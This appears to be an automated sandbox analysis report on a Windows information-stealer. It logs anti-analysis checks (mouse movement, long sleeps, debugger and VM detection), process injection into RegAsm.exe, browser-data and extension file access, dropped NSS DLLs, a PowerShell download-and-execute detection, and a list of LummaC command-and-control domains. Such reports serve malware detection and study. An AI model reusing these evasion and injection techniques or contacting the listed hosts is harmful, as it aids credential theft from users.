Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: BE0000 memory reserve \| memory write watch
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: 2740000 memory reserve \| memory write watch
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: 4740000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 15A0000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 3300000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 1840000 memory reserve \| memory write watch

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userIJEGDBGDBF.exe	Thread delayed: delay time: 922337203685477

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\sql[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2788	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe TID: 2032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe TID: 5268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 1616	Thread sleep count: 74 > 30
Source: C:\Users\userGIEGHJEGHJ.exe TID: 1864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userIJEGDBGDBF.exe TID: 2820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 508	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userIJEGDBGDBF.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf3<
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: RegAsm.exe, 0000000E.00000002.2863943868.00000000011BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware]
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2584297027.0000000001446000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2584297027.0000000001495000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.000000000121F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareW
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarev

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00446BB0 LdrInitializeThunk,

10_2_00446BB0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D160

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418A9A

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004186E3 mov eax, dword ptr fs:[00000030h]	3_2_004186E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004186E4 mov eax, dword ptr fs:[00000030h]	3_2_004186E4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DADC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041DADC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042777E SetUnhandledExceptionFilter,	3_2_0042777E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C54B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C54B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C6FAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBGIJEHIID.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02CE2139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02CE2139

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: delaylacedmn.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: writekdmsnu.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: agentyanlark.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bellykmrebk.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: underlinemdsj.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: commandejorsk.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: possiwreeste.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: famikyjdiag.site

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7B008	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F2008	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C28008	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CA4008	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E92008
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
